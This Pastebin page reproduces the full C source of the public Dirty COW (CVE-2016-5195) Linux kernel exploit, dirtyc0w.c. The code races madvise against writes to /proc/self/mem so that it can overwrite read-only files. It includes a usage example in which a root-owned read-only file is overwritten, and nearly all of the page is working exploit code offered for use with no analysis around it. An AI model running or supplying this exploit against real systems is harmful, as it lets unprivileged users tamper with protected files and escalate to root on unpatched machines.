G2A Many GEOs
SHARE
TWEET

Untitled

a guest Oct 21st, 2016 67 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
  2.  
  3. /*
  4. ####################### dirtyc0w.c #######################
  5. $ sudo -s
  6. # echo this is not a test > foo
  7. # chmod 0404 foo
  8. $ ls -lah foo
  9. -r-----r-- 1 root root 19 Oct 20 15:23 foo
  10. $ cat foo
  11. this is not a test
  12. $ gcc -lpthread dirtyc0w.c -o dirtyc0w
  13. $ ./dirtyc0w foo m00000000000000000
  14. mmap 56123000
  15. madvise 0
  16. procselfmem 1800000000
  17. $ cat foo
  18. m00000000000000000
  19. ####################### dirtyc0w.c #######################
  20. */
  21. #include <stdio.h>
  22. #include <sys/mman.h>
  23. #include <fcntl.h>
  24. #include <pthread.h>
  25. #include <string.h>
  26.  
  27. void *map;
  28. int f;
  29. struct stat st;
  30. char *name;
  31.  
  32. void *madviseThread(void *arg)
  33. {
  34.   char *str;
  35.   str=(char*)arg;
  36.   int i,c=0;
  37.   for(i=0;i<100000000;i++)
  38.   {
  39. /*
  40. You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
  41. > This is achieved by racing the madvise(MADV_DONTNEED) system call
  42. > while having the page of the executable mmapped in memory.
  43. */
  44.     c+=madvise(map,100,MADV_DONTNEED);
  45.   }
  46.   printf("madvise %d\n\n",c);
  47. }
  48.  
  49. void *procselfmemThread(void *arg)
  50. {
  51.   char *str;
  52.   str=(char*)arg;
  53. /*
  54. You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
  55. >  The in the wild exploit we are aware of doesn't work on Red Hat
  56. >  Enterprise Linux 5 and 6 out of the box because on one side of
  57. >  the race it writes to /proc/self/mem, but /proc/self/mem is not
  58. >  writable on Red Hat Enterprise Linux 5 and 6.
  59. */
  60.   int f=open("/proc/self/mem",O_RDWR);
  61.   int i,c=0;
  62.   for(i=0;i<100000000;i++) {
  63. /*
  64. You have to reset the file pointer to the memory position.
  65. */
  66.     lseek(f,map,SEEK_SET);
  67.     c+=write(f,str,strlen(str));
  68.   }
  69.   printf("procselfmem %d\n\n", c);
  70. }
  71.  
  72.  
  73. int main(int argc,char *argv[])
  74. {
  75. /*
  76. You have to pass two arguments. File and Contents.
  77. */
  78.   if (argc<3)return 1;
  79.   pthread_t pth1,pth2;
  80. /*
  81. You have to open the file in read only mode.
  82. */
  83.   f=open(argv[1],O_RDONLY);
  84.   fstat(f,&st);
  85.   name=argv[1];
  86. /*
  87. You have to use MAP_PRIVATE for copy-on-write mapping.
  88. > Create a private copy-on-write mapping.  Updates to the
  89. > mapping are not visible to other processes mapping the same
  90. > file, and are not carried through to the underlying file.  It
  91. > is unspecified whether changes made to the file after the
  92. > mmap() call are visible in the mapped region.
  93. */
  94. /*
  95. You have to open with PROT_READ.
  96. */
  97.   map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  98.   printf("mmap %x\n\n",map);
  99. /*
  100. You have to do it on two threads.
  101. */
  102.   pthread_create(&pth1,NULL,madviseThread,argv[1]);
  103.   pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
  104. /*
  105. You have to wait for the threads to finish.
  106. */
  107.   pthread_join(pth1,NULL);
  108.   pthread_join(pth2,NULL);
  109.   return 0;
  110. }
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top